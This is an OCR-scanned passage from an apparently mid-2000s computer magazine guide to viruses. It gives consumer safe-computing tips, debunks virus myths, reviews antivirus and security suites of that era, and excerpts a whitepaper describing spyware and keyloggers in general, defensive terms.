tures and  the  scanning  engine.  In  addition  to  a virus  scanner, 
it  also  includes  powerful  tools  for  debugging  Trojan  horses 
with  its  advanced  process  discovery  tool.  With  its  ActiveGuard 
feature  there’s  real-time  virus  scanning  by  default.  For  people 
who  value  PDA  resources  at  all  times  can  use  the  slow  back- 
ground scanning  option. 

Symantec  Norton  Antivirus  for  Handhelds 

Platform:  Palm  OS,  PocketPC 

From  one  of  the  most  trusted  names  in  PC  antivirus  solutions, 
Norton  Antivirus  for  Handhelds.  It  has  all  the  required  features 
that  can  be  expected  from  a PDA  antivirus  today.  The  auto-pro- 
tect  feature  provides  unobtrusive  real-time  protection  against 
malicious  code.  Automatic  scans  can  check  for  viruses  after 
expansion  card  insertion  or  desktop  synchronisation.  On- 
demand  and  on-schedule  scans  allow  you  to  examine  applica- 
tions and  files  for  viruses  at  any  time  you  want.  Virus  protection 
updates  are  automatically  transferred  from  your  desktop  com- 
puter the  next  time  you  synchronise  your  PDA.  Of  course, 
there’s  also  an  auto-update  feature  that  automatically  down- 
loads the  new  virus  definitions. 
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4.4  Safe  Computing 

There  are  many  precautions  you  can  take  while  computing.  Here 

are  a few  you  should  follow  if  you’re  paranoid  about  your  security: 

Firewalls  And  Security 

o Use  a firewall  if  you  have  an  always  on  Internet  connection. 
Corporations  can  invest  in  hardware-based  firewall  security  for 
their  networks,  while  home  users  can  opt  for  software-based 
personal  firewalls. 

o Turn  off  file  sharing  on  your  PC  when  you  don’t  need  it.  If  a port 
scan  is  done  on  your  computer,  a hacker  may  find  a back  door 
to  your  machine  and  have  access  to  your  files  via  file  sharing. 

o Don’t  open  attachments  when  you  receive  e-mail  from 
unknown  sources  and  the  subject  line  seems  unfamiliar. 

o Don’t  let  other  people  use  your  computer,  unless  you  really 
trust  them.  If  you  really  have  to  share,  then  create  a guest  login 
for  the  other  users  with  limited  rights. 

o Routinely  update  Windows  software.  The  updates  will  fix 
many  bugs  and  known  security  holes  within  the  Windows 
operating  system. 

o In  case,  regularly  used  programs  have  options  for  auto-update, 
keep  them  on.  You  never  know  when  a lethal  security  bug  may 
be  discovered. 

Privacy  Protection 

o Your  account  is  only  as  secure  as  its  password.  Create  passwords 
with  nonsensical  combinations  of  upper  and  lower  case  letters, 
numbers  and  symbols.  Also,  change  your  passwords  often.  If  you 
must  write  down  or  record  your  password,  take  steps  to  disguise 
the  information  so  no  one  else  can  make  out  what  it  is. 

o Look  at  the  privacy  policy  of  the  online  services  you  use  and  also 
before  you  enter  private  information  in  online  forms.  However, 
if  you  are  not  satisfied  with  the  policy,  or  if  there  is  no  policy 
posted,  avoid  giving  any  personal  information  to  that  site. 
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o Check  your  browser’s  cookie  settings.  You  may  accept  or  reject 
all  cookies,  or  you  may  allow  only  those  cookies  generated  by 
the  Web  sites  you  visit  often. 

o Do  not  provide  sensitive  personal  information  such  as  phone 
numbers,  passwords,  addresses,  credit  card  numbers  or  date  of 
birth  in  chat  rooms,  instant  messengers,  forum  postings,  e- 
mails  or  in  your  online  biography. 

o Ask  yourself  if  you  want  an  employer,  family  member,  or  a mar- 
keter to  be  able  to  link  you  to  your  public  postings  made  in 
forums,  guestbooks,  or  newsgroups.  Most  of  these  services 
never  delete  your  postings.  Even  the  one’s  that  have  disap- 
peared off  the  Web  site  are  usually  accessible  in  the  archives. 

o Use  a pseudonym  and  a non-descriptive  e-mail  address  when 
you  participate  in  public  forums.  Consider  obtaining  an  e- 
mail  address  from  one  of  the  free  Web-based  e-mail  services 
for  this  purpose. 

o Be  aware  of  the  possible  social  dangers  of  being  online. 
Harassment,  stalking,  being  ‘flamed’  (emotional  verbal  attacks), 
or  ‘spamming’  (being  sent  unsolicited  messages)  are  just  a few 
examples.  Women  can  be  vulnerable  if  their  e-mail  addresses 
are  recognisable  as  a woman’s  name.  Consider  using 
gender-neutral  e-mail  addresses  and  nicknames. 

o If  your  children  use  the  Internet,  teach  them  appropriate  online 
privacy  behaviour.  Caution  them  against  revealing  information 
about  themselves  and  your  family. 

o Use  only  secure  Web  sites  when  you  transmit  sensitive  personal 
information  over  the  Internet.  When  you  provide  your  credit 
card  account  number  to  a shopping  site,  for  example,  be  sure 
that  the  transmission  is  secure.  Look  for  the  unbroken  padlock 
at  the  bottom  right  of  the  screen.  Also  make  sure  the  Web 
address  has  the  letter  ‘s’  after  http  in  the  address  bar  at  the  top 
of  the  page. 

o Be  aware  that  online  activities  leave  electronic  footprints  for 
others  to  see.  Your  own  ISP  can  determine  what  search  engine 
terms  you  use,  what  Web  sites  you  visit,  and  the  dates,  times, 
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and  durations  of  your  online  sessions.  Web  site  operators  can 


often  track  the  activities  you  engage  in  by  placing  ‘cookies’  on 
your  computer. 


Mobile  Phones  And  PDAs 

o Frequently  back  up  all  data  such  as  your  phoneboolc,  calendar, 
and  others  to  your  PC.  If  you  aren’t  provided  with  a good  back- 
up software,  it’s  advisable  to  purchase  one. 

o Don’t  forget  to  keep  your  Bluetooth  off  when  not  in  use.  Even 
when  you  turn  it  on,  keep  your  Bluetooth’s  visibility  mode  as 
hidden  from  other  devices. 

o Never  accept  any  Bluetooth  input  from  an  unknown  source.  You 
could  get  infected  with  a virus. 
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Myths  And 
Slayers 


The  problem  with  epic  battles  is  that  there  is  always  a few  sto- 
ries to  be  told,  and  not  all  of  them  are  entirely  true. 

This  section  will  uncover  some  of  these  myths  and  also  take  a 
look  at  10  solutions  that  you  can  entrust  your  data  security  to. 
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Myths  & Solutions 


5.1  Myths  About  Computer  Viruses 

As  we  have  said  before,  all  the  suspicious  activity  that  happens  on 
your  computer  cannot  be  blamed  on  viruses.  There  could  be  many 
reasons  why  your  PC  has  been  acting  up,  such  as  applications 
clashing,  missing  files,  hardware  incompatibility  and  much  more. 
There  are  a lot  of  myths  and  false  notions  that  people  seem  to  have 
towards  viruses  and  their  solutions.  This  section  hopes  to  shed 
light  on  some  common  misconceptions. 

Only  Microsoft  operating  systems  get  viruses 

Most  virus  writers  want  their  work  to  be  famous  and  get  world- 
wide recognition.  With  the  majority  of  the  world  using  Microsoft 
operating  systems,  there  are  no  prizes  for  guessing  why  most 
malicious  code  is  written  for  them.  There  are  viruses  for 
Macintosh  and  Linux  computers  as  well,  though  not  as  many. 

If  the  EXE  attachment  is  from  someone  I know,  surely  it’s  safe 

Just  because  you  know  the  person,  doesn’t  mean  that  the  person 
is  aware  of  the  mails  he’s  forwarding.  He  could  unknowingly  be 
forwarding  an  infected  attachment  without  realizing  it,  or  it 
could  be  a worm  on  his  computer  spreading  its  code  to  everyone 
on  his  address  book. 

The  worm  can’t  hurt  me  if  I don’t  open  the  attachment 

We  only  wish  it  was  that  simple.  Today,  most  worms  can  infect 
your  computer  and  then  spread  to  all  your  contacts  even  if  you  just 
open  the  mail  that  contains  the  worm.  You  need  to  pay  attention 
to  the  subject  line  of  the  message. 

Installing  an  antivirus  guarantees  my  protection 

Absolutely  not!  Depending  on  the  kind  of  antivirus  package  you 
have,  it  may  have  its  own  strengths  and  weaknesses.  With  viruses 
getting  smarter  by  the  day,  there’s  a strong  chance  that  the  latest 
batch  may  be  undetectable  for  the  antivirus’  heuristics  system. 

I don’t  use  an  e-mail  client,  so  I’m  safe  from  e-mail  viruses 

Though  this  may  be  true  to  a small  extent,  it’s  not  a foregone  con- 
clusion. Yes,  using  an  e-mail  client  does  give  a virus  the  opportu- 
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nity  to  use  the  security  holes  of  the  application,  but  Web-based  e- 
mail  doesn’t  really  have  any  other  advantages.  You  will  still  receive 
viruses  in  your  Web-based  e-mail,  and  they  will  infect  your  com- 
puter if  you  download  the  attachments. 


Formatting  a hard  drive  is  the  best  way  to  get  rid  of  a virus. 

Yes,  but  only  if  you  are  not  saving  any  of  the  data  on  it.  If  you  plan 
to  backup  your  data,  chances  are  the  virus  will  embed  itself  in  that 
backed  upO  data,  and  as  soon  as  you  restore  the  backup,  you  are 
infected  again!  The  best  ways  to  get  rid  of  viruses  have  been 
explained  in  chapter  2.5. 


5.2  Ten  Antivirus  Solutions 


It  can  be  quite  a daunting  task  to  find  the  perfect  antivirus.  There 
are  so  many  options  available,  and  all  seem  to  offer  similar  fea- 
tures. What  you  need  to  do  is  identify  only  the  features  that  you 
need.  You  also  need  to  keep  your  system  configuration  in  mind, 
and  remember  that  an  antivirus  application  is  always  running  in 
the  background-an  antivirus  application  that  is  system  heavy 
could  kill  a low-end  system. 

To  help  you  make  your  choice  easily,  we  have  put  together  a list 
of  ten  of  the  best  antivirus  packages  across  the  world.  We  will  tell 
you  each  solution’s  advantages  and  disadvantages,  and  what  fea- 
tures they  offer,  and  this  will  help  you  make  a thoughtful  buying 
decision. 

So  many  options... 

There  are  so  many  customised  security  solutions  available  for  just 
about  every  kind  of  user  today.  While  the  paranoid  few  may  like  to 
pile  up  on  a number  of  applications,  just  to  be  sure  that  their  sys- 
tem is  secure  from  every  threat  in  existence,  some  are  more  than 
satisfied  with  a barebones  antivirus  scanner.  We  have  highlighted 
some  antivirus  packages  that  may  be  ideal  for  your  needs,  and  also 
separated  them  into  different  categories. 
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The  Complete  Security  Solution 

When  you’re  using  your  PC  for  commercial  purposes,  the  data 
on  your  machine  is  usually  extremely  sensitive  and  possibly 
even  confidential.  You  don’t  want  anything  happening  to  it  by  a 
virus  attack,  and  you  definitely  don’t  want  it  falling  into  the 
wrong  hands.  For  security  of  this  level  you  need  a lot  more  than 
a mere  antivirus;  you  need  a specialised  suite  of  utilities  that 
secure  your  machine  from  most  threats.  That’s  exactly  where 
the  following  software  come  in. 

ZoneAlarm  Security  Suite  5.5 

It’s  a given  that  ZoneAlarm  is  everyone’s  first  choice  when  it 
comes  to  personal  firewalls.  Now  imagine  a well  reputed  brand 
like  that  bringing  you  a complete  security  system-a  package  that 
claims  to  be  the  only  thing  you  will  require  to  keep  yourself  free 
from  viruses  and  other  malicious  software  attacks.  With  big 
names  already  in  the  market  with  similar  packages,  how  does  this 
one  hold  up?  Pretty  well  actually! 
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The  antivirus  module  is  licensed  from  Computer  Associates. 
Just  like  any  decent  antivirus,  this  one  too  is  capable  of  scanning 
files  in  real-time  as  well  as  on  demand  and  on  schedule.  With  a 
smart  heuristics  system  in  place,  the  antivirus  is  effective  against 
all  kinds  of  malicious  code,  including  viruses  and  trojans,  even 
before  there’s  a signature  available  for  them.  It  works  out  to  be 
extremely  effective  in  conjunction  with  the  firewall. 

The  firewall  module  was  already  perfected  by  Zone  Labs,  so  it’s 
pretty  obvious  that  it’s  the  firewall  that’s  the  biggest  selling  point  of 
this  package.  The  firewall  features  intrusion  blocking  technology 
that  systematically  identifies  hackers  and  blocks  access  attempts, 
along  with  a stealth  mode  that  automatically  makes  your  computer 
invisible  to  anyone  on  the  Internet.  The  firewall  is  pretty  easy  to  set 
up  and  configure,  which  makes  it  convenient  even  for  novice  users. 

The  antispam  module  is  licensed  from  MailFrontier.  It  inte- 
grates well  with  e-mail  clients  such  as  Outlook  Express  and  filters 
out  all  the  incoming  spam  quite  effectively.  It  even  monitors  the 
outgoing  mail  for  any  suspicious  activities,  such  as  too  many 
receivers  for  a single  mail  or  too  many  mails  being  sent  in  too 
short  a time  interval.  The  IMSecure  module  protects  your  Internet 
messengers  from  spim  and  any  other  suspicious  activity. 

Other  features  include  modules  for  privacy  protection,  which 
includes  cookie  control,  ad  blocking  and  protection  form  mali- 
cious scripts.  There’s  also  a parental  lock  for  preventing  access  to 
sites  unsuitable  for  children. 

Pros:  Excellent  firewall;  antivirus  and  antispam. 

Cons:  antispam  doesn’t  filter  your  existing  inbox. 

Panda  Platinum  Internet  Security  2005 

Panda  Platinum  Internet  Security  2005  is  designed  to  be  the  only 
package  you  will  need  to  protect  yourself  from  all  kinds  of  prob- 
lems that  you  can  get  into  while  online.  The  package  integrates  an 
antivirus  application,  a spam  filter,  a firewall,  and  even  parental 
control  technology  that  can  block  objectionable  content  such  a 
pornographic  sites. 
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The  antivirus  is  based  on  Panda’s  TruPrevent  technology, 
which  works  on  an  advanced  heuristics  engine  that  can  block 
out  most  malicious  code  on  its  own.  That,  combined  with  the 
constant  updates  in  the  form  of  virus  signatures  from  Panda, 
makes  the  antivirus  a very  strong  contender.  As  with  all  good 
antivirus  software,  this  one  also  has  a real-time  scanner  that 
checks  files  on  access  and  a system  scanner  for  on  demand  and 
scheduled  scans.  The  antivirus  is  highly  proficient  in  detecting 
and  cleaning  spyware,  in  fact  it’s  known  to  be  one  of  the  best  spy- 
ware  cleaners  in  an  antivirus  package. 

However,  the  firewall  module  provided  by  Sygate  leaves  a lot  to 
be  desired.  Though  the  firewall  is  pretty  good  at  keeping  your 
computer  invisible  to  prying  eyes,  it’s  definitely  not  the  most 
secure  option  out  there.  A regular  trojan  attack  would  be  suffi- 
cient to  humble  the  firewall’s  defences. 

The  antispam  module  integrates  well  with  common  e-mail 
clients  such  as  Outlook  Express  and  Eudora.  Unfortunately,  this 
too  is  not  really  as  secure  as  we  would  like  it  to  be.  It  lacks  features 
such  as  intelligent  mail  sorting. 
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Pros:  Feature  Packed;  great  antivirus  and  anti-spyware. 

Cons:  Antispam  not  very  effective;  firewall  needs  to  be  more 
secure. 


Trend  Micro  PC-cillin  Internet  Security  2005 

PC-cillin  Internet  Security  2005  includes  an  antivirus,  a full- 
fledged  firewall  and  also  spyware  and  spam  blocking  tools.  Just  as 
the  name  suggests,  it’s  an  overall  solution  to  all  kinds  of  threats 
you  can  face  while  surfing  the  Internet. 


First  up,  the  antivirus  system  is  commendable  for  its  silent  and 
stealthy  performance.  With  absolutely  no  drop  in  system  perform- 
ance, you’ll  hardly  even  notice  that  it’s  there.  Even  when  scanning 
disks,  you  can  continue  with  basic  tasks  without  noticing  a drop 
in  system  performance.  Also,  its  feature  set  is  par  for  the  course 
with  real-time  as  well  as  on  demand  and  on  schedule  scanning. 


Though  this  suite  does  not  scan  for  spyware  in  real-time,  it 
automatically  scans  for  spyware  as  well,  when  running  a virus 
scan.  You  can  also  run  the  spyware  scanner  separately.  When  PC- 
cillin  detects  potential  spyware,  it  gives  you  the  option  of  deleting 
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the  program  or  going  to  Trend  Micro’s  support  site  to  learn  more 
about  it.  The  only  problem  is  that  the  spyware  scanner  is  a little 
paranoid,  and  even  detects  regular  adware  programs  as  spyware, 
which  may  mean  that  a few  adware-supported  programs  you  like 
will  stop  working  after  a spyware  cleansing. 

Trend  Micro’s  spam  filter  tags  any  e-mail  with  objectionable 
content  with  the  word  “SPAM”  in  the  subject  line.  This  allows  for 
easy  rule  filtering  and  prevents  potentially  important  e-mail  from 
being  deleted  automatically  by  the  application.  The  spam  feature 
also  includes  customisable  “whitelists”  and  “blacklists”  and  the 
ability  to  submit  improperly  tagged  e-mail  directly  to  the  analysts 
at  Trend  Micro. 

The  personal  firewall  comes  with  selectable  profiles  that  best 
match  your  use.  It  has  the  ability  to  automatically  switch  profiles 
when  you  change  networks,  which  is  extremely  handy  for  laptop 
users.  The  firewall  silences  ports,  keeping  you  virtually  invisible 
on  the  Internet,  and  also  controls  network  traffic  to  stop  worms 
from  spreading. 

Pros:  Light  on  the  system;  great  interface. 

Cons:  No  real-time  spyware  detection. 
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Security  for  a Home  User 


Home  users  are  generally  more  casual  when  it  comes  to  securi- 
ty threats  than  corporations.  Firstly,  home  users  don’t  like 
spending  too  much  for  suites  that  probably  wouldn’t  be  any 
more  effective  than  a good  antivirus,  for  the  level  of  security 
threats  they  face.  Many  home  users  prefer  to  use  their  PC  for 
entertainment  purposes,  so  having  a league  of  security  related 
software  running  in  the  background  is  not  an  option,  especial- 
ly when  you  are  trying  to  eke  out  maximum  performance  from 
your  DVD  player,  or  when  playing  a game.  You  need  something 
light  and  effective 
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Norton  Antivirus  2005 

Over  the  years,  Symantec’s  antivirus  services  have  proved  to  be  the 
first  place  that  one  looks  to  find  information  on  the  latest  virus 
outbreaks.  Norton  Antivirus  is  one  of  the  most  highly  used  com- 
mercial antivirus  packages  in  India,  mainly  due  to  its  ease  of  use 
and  availability.  Norton  Antivirus  2005  is  the  latest  in  Symantec’s 
desktop  antivirus  solutions. 

Norton  AntiVirus  2004  had  a host  of  missing  features,  which 
Symantec  have  remedied  in  the  2005  edition.  The  most  notable  is 
an  integrated  lightweight  firewall  titled  “Norton  Internet  Worm 
Protection”  that  blocks  out  any  unwanted  incoming  traffic. 
Though  it  is  effective  in  most  cases,  it  doesn’t  monitor  any  out- 
bound traffic,  which  makes  it  less  effective  as  compared  to  a good 
standalone  firewall. 


Like  its  predecessor,  Norton  Antivirus  2005  is  a robust  solution 
against  viruses  and  also  against  other  Net  nuisances  such  as  spy- 
ware,  adware,  trojans,  etc.  Oddly  though,  the  Norton  real-time 
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scanner  doesn’t  seem  to  look  for  spyware,  and  you  can  only  detect 
spyware  when  performing  a system  scan. 

On  the  downside,  Norton  Antvirus  is  still  quite  system  heavy, 
which  may  put  off  a lot  of  performance  enthusiasts.  Don’t  expect 
to  do  much  on  your  computer  while  running  a system  scan  as  that 
will  easily  drain  most  of  your  resources,  making  every  other  appli- 
cation painfully  slow.  Nonetheless,  Symantec’s  reputation  with 
virus  definitions,  the  extensive  protection  against  all  kinds  of 
malicious  software  and  the  best  interface  among  all  antivirus 
packages,  makes  Norton  a strong  option. 

Pros:  Excellent  interface;  great  virus  definition  support 

Cons:  Significantly  system  heavy;  no  real-time  spyware  detection. 


McAfee  VirusScan  Home  9.0 

McAfee  antivirus  packages  have  always  been  a great  option,  but  if 
there  was  one  particular  flaw  that  made  some  users  shy  away 
from  it,  it  was  the  complicated  interface.  But  version  9.0’s  tabular 
interface  makes  sure  that  all  the  required  options  are  well  sorted 
and  easy-to-find. 


McAfee  is  generally 
light  on  the  system  as  it 
secretly  keeps  a watch  on 
all  the  files  accessed  by 
your  system.  Just  like 
Norton  Antivirus  2005,  it 
can  detect  viruses,  trojans 
and  worms  in  real-time, 
but  detects  spyware  and 
adware  only  during  the 
system  scan.  The  good 
thing  is  running  a system 
scan  on  regular  intervals 
is  not  really  a big  issue, 
because  even  though  the 
system  scanning  process 
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takes  longer  than  other  antivirus  packages,  it  uses  up  a lot  less 
resources,  which  means  that  you  can  continue  your  work  while 
the  system  is  being  checked. 

One  important  feature  missing  from  VirusScan  9.0  is  a firewall 
or  at  least  a port-blocking  technology  to  stop  unsolicited  inbound 
packets.  These  days  having  a firewall  on  your  system  is  a must, 
especially  with  the  colossal  rise  in  malicious  software  threats. 
Many  other  packages  have  spotted  this  danger  and  now  come  with 
inbuilt  firewalls.  If  you  already  have  a sturdy  firewall  running  in 
your  system  and  only  need  a good  antivirus  package  that  doesn’t 
take  its  toll  on  your  resources,  then  McAfee  VirusScan  Home  9.0  is 
definitely  worth  some  consideration. 

Pros:  Improved  interface;  not  too  heavy  on  system  resources. 
Cons:  No  integrated  firewall;  no  real-time  spyware  detection. 


NOD32  Antivirus  System  2.0 

NOD32  is  a multi-award  winning  antivirus  package  that’s  slowly 
gaining  popularity  as  the  antivirus  to  have.  There  are  just  too 
many  strong  features  in  NOD32  to  sideline  it  while  making  a deci- 
sion to  buy  an  antivirus. 

The  NOD32  Antivirus  System  is  essentially  divided  into 
four  parts: 

o NOD32  is  the  complete  on  demand  and  on  schedule  system 
scanner. 

o AMON  is  a real  time  scanner  that  checks  files  on  access. 

o DMON  protects  the  system  from  viruses  contained  in 
various  documents  such  as  macro  viruses  in  Microsoft 
Word  documents. 

o IMON  scans  incoming  POP3  and  HTTP  streams  protecting  you 
from  Web  and  e-mail  threats. 
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NOD32  Control  Center 
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One  feature  that  most  advanced  users  enjoy  is  its  advanced 
tweaking  capabilities.  However,  casual  users  may  be  turned  off 
from  the  not-so-friendly  interface.  NOD32  is  an  ideal  solution  for 
gamers  who  require  every  ounce  of  their  system  resources  while 
playing  a game.  There  isn’t  a noticeable  drop  in  system  resources, 
which  makes  it  quite  alright  to  keep  the  antivirus  program  run- 
ning while  playing  games. 

The  lack  of  firewall  can  be  considered  a drawback,  but  the 
heuristics  system  in  NOD32  is  one  of  the  best  in  the  business.  Even 
though  the  virus  definition  updates  keep  coming  at  almost  a daily 
basis,  the  heuristics  system  alone  can  block  out  any  malicious  soft- 
ware that’s  about  to  act  up,  making  it  a valuable  antivirus  even 
when  it’s  not  completely  patched  up  to  existing  standards. 

NOD  32  protects  against  all  kinds  of  malicious  codes,  namely 
viruses,  trojans,  worms,  spyware  and  adware. 

Pros:  Very  light  on  the  system;  excellent  heuristics  engine;  fre- 
quent virus  definition  updates  in  small  packages. 

Cons:  No  integrated  firewall;  interface  aimed  at  advanced  users. 
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Avast!  4 Home  Edition 

Many  home  users  would  think  twice  about  spending  for  an  antivirus 
package.  After  all,  paying  a decent  sum  on  a yearly  basis  to  protect 
data  that  may  not  be  as  important  to  them  isn’t  exactly  a very  good 
idea.  That’s  where  the  beauty  of  freeware  comes  in.  Yes,  Avast!  is  free 
for  home  usage  and  you  can  check  it  out  on  the  Digit  DVD. 

While  freeware,  to  most  people,  usually  translates  to  an  ama- 
teurishly made  home  project  by  a pimply  faced  teenager,  we  assure 
you  that’s  not  the  case  here.  Avast!  antivirus  features  outstanding 
malware  detection  abilities,  together  with  high  performance.  The 
interface  is  simple  and  easy  to  follow  for  most  purposes.  There’s 
also  an  option  to  skin  the  interface  just  in  case  you  want  to  give 
your  antivirus  a new  look.  Why  you  would  want  to  do  that  to  an 
antivirus,  however,  is  beyond  us. 

The  antivirus  consists  of  a real-time  scanner  that  scans  files  for 
viruses  on  access,  on  demand  or  on  schedule.  There’s  also  a real- 
time scanner  for  your  incoming  e-mail,  which  prevents  e-mail-based 
viruses  and  worms  before  they  get  a chance  to  act  up.  However,  the 
e-mail  functionality  is  offered  for  Microsoft  Outlook  only. 

The  virus  scanner  is  based  on  an  intelligent  heuristic  system 
that  detects  viruses  on  your  computer  and  your  e-mails.  Virus  def- 
initions are  regularly  updated  and  Avast!  intelligently  connects  to  the 
server  and  automatically  downloads  the  updates  (which  are  generally 
quite  tiny)  whenever  you  connect  to  the  Internet. 

Pros:  Free;  light  on  the  system  and  very  effective  against  viruses. 
Cons:  Barebones  antivirus  with  no  frills  such  as  a firewall  or  spy- 
ware  scanner. 
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Specialised  Solutions 


Though  most  suites  are  quite  proficient  when  it  comes  to  moni- 
toring all  kinds  of  malicious  threats,  there  may  be  some  aspects 
when  they’re  not  exactly  performing  at  a level  that  they  should  be. 
For  example,  most  antivirus  solutions  have  real-time  scanners  for 
all  kinds  of  malicious  software,  but  not  for  spyware,  which  hap- 
pens to  be  a pretty  major  threat  today.  For  that  you  may  require  a 
specialised  software  that  can  secure  your  PC  from  these  resource 
hungry  programs.  The  same  logic  can  be  applied  to  some  of  the 
other  security  issues  that  could  be  a bit  out  of  the  league  for  your 
resident  antivirus. 
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EmailProtect  is  a dedicated  spam-filtering  program  that  doesn’t  use 
the  simple  whitelists  and  blacklists  that  other  programs  depend  on. 
Instead,  you  fine-tune  categories  and  preferences  to  teach 
EmailProtect  how  to  do  the  work  for  you.  EmailProtect  relies  on  your 
settings  to  filter  your  inbox.  You  choose  the  keywords,  e-mail  address, 
domain  names,  and  even  servers  to  watch  for,  and  the  filter  takes 
over.  You  can  opt  to  allow  or  block  using  over  20  categories  (such  as 
Adult,  Drugs/Alcohol,  Shopping,  or  Pornography).  Categories  are  pre- 
defined, which  means  you  don’t  have  to  take  time  to  decide  details 
for  each,  you  just  pick  which  you  want  allowed  or  blocked. 


EmailProtect  integrates  into  your  e-mail  client  and  adds  a quar- 
antine area.  If  a message  is  suspect,  the  program  will  send  it  to 
quarantine  and  also  notify  you  immediately,  if  that’s  what  you 
want.  From  there,  you  can  move  the  e-mail  back  to  your  inbox, 
delete  it,  or  use  it  to  create  new  filtering  rules.  The  tools  are  sim- 
ple to  use  and  everything  you  need  is  just  a button  click  away. 

EmailProtect  features  a protected  way  to  preview  e-mails  with 
images.  You  can  turn  image  display  on  or  off  quickly.  You  can  also 
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It’s  easy  enough  for  casual  users  to  simply  install  it  and  then 
forget  about  spyware,  but  at  the  same  time  it  features  some  seri- 
ous customisation  options  for  advanced  users. 

Pros:  Real-time  spyware  scanning;  Consumerware  section. 

Cons:  None 

Wormguard  3 

Wormguard  is  arguably  the  best  protection  you  can  have  against 
Internet  worms.  When  your  firewall  and  antivirus  fail  to  detect  a 
worm  infecting  your  computer,  that’s  where  specialised  software 
such  as  wormguard  can  come  to  the  rescue.  Its  highly  intelligent 
heuristics  system  analysis  files  generically  rather  than  relying  on 
signatures  for  known  worms. 

Wormguard  provides  real-time  file  scanning  on  all  executed 
files  to  ensure  they’re  not  infected  before  the  worm  even  gets  a 
chance  to  act  up.  It  also  neutralises  many  severe  Windows  vulner- 
abilities, such  as  the  use  of  hidden  extensions,  multiple  file  exten- 
sions, and  excessive  spaces  in  filenames. 

The  on  demand  scanner  provides  Deep-Scanning  to  detect 
password-stealers,  keystroke-loggers,  IRC  worms,  references  to 
known  worm  authors,  etc. 

Pros:  Easy  to  use;  highly  effective. 

Cons:  Slightly  outdated  but  new  version  coming  soon. 
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If  you’ve  gotten  this  far,  you’ve  probably  learnt  a lot  already. 

However,  for  those  of  you  who  like  to  go  into  the  nitty-gritty 
of  things,  the  whitepapers  that  follow  should  further  improve 
your  understanding  of  the  topic  at  hand.  Here,  you’ll  find  in- 
depth  material  on  spyware,  adware,  the  need  for  a secure 
operating  systems,  network  security  best  practices,  and  so  on. 
And  if  you  thought  it’s  only  Windows  that’s  affected  by  viruses, 
there’s  also  a paper  on  viruses  that  attack  Unix  systems. 
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I.  Spyware  And  Adware 

Source: 

“Spyware:  The  first  thing  you  need  to  know  is  that  you  probably  have  it” 
available  at 

ww2.websense.com/docs/WhitePapers/Spywarevouprobablyhaveit.pdf 

Spyware— software  installed  on  a computer  usually  without  the 
user’s  knowledge  or  permission— along  with  adware  and  other 
similar  software,  gathers  information  and  sends  it  back  to  the 
advertiser  who  initiated  it  or  other  interested  parties.  Spyware  can 
collect  and  transmit  information  such  as  keystrokes,  Web  surfing 
habits,  passwords,  e-mail  addresses,  and  other  sensitive  informa- 
tion you  may  not  want  to  share  outside  your  organisation. 
Spyware  also  misuses  system  resources  and  bandwidth  as  it  tracks 
and  transmits  information.  More  seriously,  spyware  can  also  pose 
grave  security,  confidentiality,  and  compliance  risks. 

Spyware  programs  collect  data  on  users  and  their  computing 
behaviours  and  then  transmit  that  information  back  to  the  spy- 
ware  host  server.  These  programs  can  also  monitor  keystrokes, 
scan  files  on  hard  drives,  secretly  install  other  programs,  and  even 
make  changes  to  default  computer  settings.  Spyware  is  often 
acquired  surreptitiously  when  users  download  a ‘real’  application 
or  file,  visit  certain  Web  sites,  or  click  on  a deceptive  pop-up  win- 
dow. Unlike  spyware,  which  is  acquired  without  user  knowledge  or 
approval,  adware  is  installed  with  permission,  usually  after  the 
user  agrees  to  the  terms  of  a long  and  confusing  End  User  License 
Agreement  (EULA).  These  more  benign  programs  also  collect  infor- 
mation about  users  or  user  habits,  but  typically  use  it  to  tailor 
future  pop-up  advertisements  to  users’  preferences  for  marketing 
purposes.  These  programs  cause  performance  problems  and  use 
expensive  computing  resources— processing  power,  drive  space, 
and  bandwidth.  They  can  also  cause  software  conflicts  with  legit- 
imate programs  and  affect  employee  productivity.  Of  most  con- 
cern to  organisations,  however,  is  the  fact  that  spyware  compro- 
mises information  security  and  consumes  valuable  IT  Help  Desk 
resources.  Organisations  whose  investors  and  clients  rely  on  them 
to  safeguard  personal,  medical,  and  financial  information  need  a 
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way  to  prevent  spyware  from  covertly  accessing  and  transmitting 
critical  corporate  information.  Similarly,  organisations  whose 
Help  Desk  resources  are  burdened  to  correct,  often  by  ‘re-imaging’ 
entire  systems  thereby  preventing  the  corruption  of  the  desktop 
computing  environments.  The  security  measures  currently  in 
place  in  most  organisations-a  combination  of  a firewall,  antivirus 
software,  and  spyware/adware  removal  programs-do  not  adequate- 
ly address  the  threat  of  spyware.  Since  firewalls  operate  at  the 
boundary  of  the  network,  they  have  no  visibility  into  the  spyware 
running  inside  the  network.  Anti-virus  solutions  are  not  adequate 
either,  since  anti-virus  software  typically  doesn’t  include  spyware 
signatures  and  cannot  prevent  spyware  from  transmitting  infor- 
mation. And  spyware  removal  programs,  which  are  targeted  to 
individual  consumers  not  organisations,  do  not  provide  a central- 
ly managed  solution  and  do  not  adequately  address  the  burden  of 
application  conflicts.  Organisations  need  a way  to  keep  spyware 
from  gaining  access  to  their  systems  in  the  first  place.  To  do  this, 
organisations  must  be  able  to  prevent  employees  from  visiting 
sites  that  distribute  spyware  and  from  downloading  applications 
that  are  infected  with  spyware.  For  spyware  that  may  be  brought 
on  to  the  desktops  through  other  channels,  such  as  home  or 
mobile  laptop  use,  or  via  CDs  or  eFlash  drives,  organisations  also 
need  a way  to  stop  spyware  from  ever  launching,  thereby  protect- 
ing the  corruption  of  that  desktop,  as  well  as  preventing  the  trans- 
mission of  data  back  to  host  servers. 

Some  spyware  programs  collect  information  using  ‘keystroke 
loggers’,  which  capture  information  about  the  user’s  computer 
activities,  including  cookies  and  time  spent  on  certain  sites.  Some 
capture  all  keystrokes  users  make;  others  are  more  focused, 
recording  Web  sites  visited,  passwords,  e-mails,  credit  card  num- 
bers, and  so  on.  Most  keyloggers  are  invisible  and  save  recorded 
keystrokes  into  a log  file  that  is  transmitted  periodically  back  to 
the  host  server.  Some  can  even  record  both  sides  of  instant  mes- 
saging chat  conversations  (for  example,  MSN  Messenger  and 
Yahoo!  Messenger). 

Spyware  can  also  read  a computer’s  unique  hardware  ID  num- 
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ber  (MAC  address)  and  IP  address,  and  can  combine  that  informa- 
tion with  surfing  habits  and  correlate  it  with  any  personal  infor- 
mation provided  during  a ‘free’  software  download  or  when  a file 
attachment  was  opened.  This  information  can  then  be  traded  with 
affiliate  advertisers,  building  a complex  dossier  on  individual 
users  and  what  they  like  to  do  on  the  Internet. 

